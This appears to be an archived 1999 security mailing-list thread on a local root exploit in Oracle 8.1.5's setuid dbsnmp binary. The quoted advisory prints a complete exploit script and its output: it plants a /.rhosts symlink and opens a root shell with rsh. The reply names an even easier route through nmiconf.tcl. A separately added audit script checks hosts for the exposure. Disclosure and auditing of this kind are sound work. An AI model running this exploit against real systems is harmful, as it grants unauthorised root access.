There is a much easier way to exploit dbsnmp than this.

Simply edit the file $ORACLE_HOME/network/agent/config/nmiconf.tcl,
which is executed when dbsnmp starts up.

This was discovered months ago and reported on this list by
Gilles Parc, gparcat_private

Jared Still
Certified Oracle DBA and Part Time Perl Evangelist ;-)
Regence BlueCross BlueShield of Oregon
jkstillat_private - Work - preferred address
jkstillat_private - Work
jkstillat_private - private

On Sat, 13 Nov 1999, Tellier, Brock wrote:

> Greetings,
>
> OVERVIEW
> A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user
> to obtain root privileges.
>
> BACKGROUND
> My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition.
> This shouldn't make any difference, however, and I would consider any
> UNIX Oracle implementation to be exploitable.
>
> DETAILS
> When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by
> default) will dump two log files out into pwd, dbsnmpc and dbsnmpt. If
> these files do not exist, dbsnmpd will attempt to create them mode 666
> and dump around 400 bytes of uncontrollable output into them. If the
> files do exist, dbsnmp will append these 400 bytes but not change the
> permissions. Thus if root does not have an .rhosts file, we can obtain
> root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts. One
> thing to note about the exploit is that on my particular implementation,
> a normal user does not have read access above /product/ in the Oracle
> path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp). This
> won't prevent you from running the exploit since the execute bit is set
> for world on all of Oracle's directories, but you may have to guess
> about the location of dbsnmp. This can usually be done by examining the
> process list for Oracle entries.
>
> EDITORIAL
> One small rant about Oracle is their ridiculously complicated bug
> reporting scheme, which asks you 2814 questions and allows you ONE line
> of text to explain your problem. In this day and age, I don't
> understand why every major software vendor doesn't have something as
> simple as a mailto securityat_private SOMEWHERE on their site. In
> fact, when I searched Oracle's web page, I got zero hits on the word
> "security". Perhaps this address does exist and a bugtraq reader would
> care to enlighten me.
>
> EXPLOIT
>
> oracle8% uname -a; id
> SunOS oracle8 5.6 Generic_105181-05 sun4u sparc
> SUNW,Ultra-5_10
> uid=102(btellier) gid=10(staff)
> oracle8% /tmp/oracle.sh
> couldn't read file "/config/nmiconf.tcl": no such file or directory
> Failed to initialize nl component,error=462
> Failed to initialize nl component,error=462
> #
> --- oracle.sh ---
> #!/bin/sh
> # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others
> # You'll probably have to change your path to dbsnmp
> # Exploit will only work if /.rhosts does NOT exist
> #
> # Brock Tellier btellierat_private
> cd /tmp
> unset ORACLE_HOME
> umask 0000
> ln -s /.rhosts /tmp/dbsnmpc.log
> /u01/app/oracle/product/8.1.5/bin/dbsnmp
> echo "+ +" > /.rhosts
> rsh -l root localhost 'sh -i'
> rsh -l root localhost rm /tmp/*log*
> rsh -l root localhost rm /.rhosts
> ------
>
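For administrators who want to check a host for the conditions this thread describes (a setuid-root dbsnmp, a missing /.rhosts, and planted symlinks carrying the dbsnmp log-file names in /tmp), here is an added audit script; it is not from either poster, and the dbsnmp path it defaults to is the one quoted in the post, an assumption you should adjust for your install.

```shell
#!/bin/sh
# Added audit helper (not part of the original thread). Checks for the
# preconditions of the dbsnmp symlink issue discussed above. The default
# ORACLE path is an assumption taken from the post; adjust it as needed.

# Return 0 if FILE is setuid and owned by root, the risky dbsnmp setup.
is_setuid_root() {
    f="$1"
    [ -u "$f" ] || return 1
    owner=$(ls -ld "$f" | awk '{print $3}')
    [ "$owner" = "root" ]
}

# Print any symlink in DIR (default /tmp) that carries one of the names
# dbsnmp writes its log files under. A user-owned link with one of these
# names in a world-writable directory is the planted-link pattern.
# Return 0 if at least one such link was found, 1 otherwise.
find_dbsnmp_log_symlinks() {
    dir="${1:-/tmp}"
    hit=1
    for name in dbsnmpc dbsnmpt dbsnmpc.log dbsnmpt.log; do
        p="$dir/$name"
        [ -L "$p" ] || continue
        echo "$p -> $(readlink "$p")"
        hit=0
    done
    return $hit
}

# Run the checks against a candidate dbsnmp binary and report findings.
# Usage: audit_dbsnmp [/path/to/dbsnmp]
audit_dbsnmp() {
    bin="${1:-/u01/app/oracle/product/8.1.5/bin/dbsnmp}"   # assumption
    if [ -f "$bin" ] && is_setuid_root "$bin"; then
        echo "WARN: $bin is setuid root (the configuration the post relies on)"
    fi
    if [ ! -e /.rhosts ]; then
        echo "INFO: /.rhosts is absent, so a planted link could create it"
    fi
    find_dbsnmp_log_symlinks /tmp || echo "OK: no dbsnmp log-name symlinks in /tmp"
}
```

Run `audit_dbsnmp /path/to/dbsnmp` from a root shell on the database host; a WARN plus any reported symlink is the combination worth acting on.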
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:12:50 PDT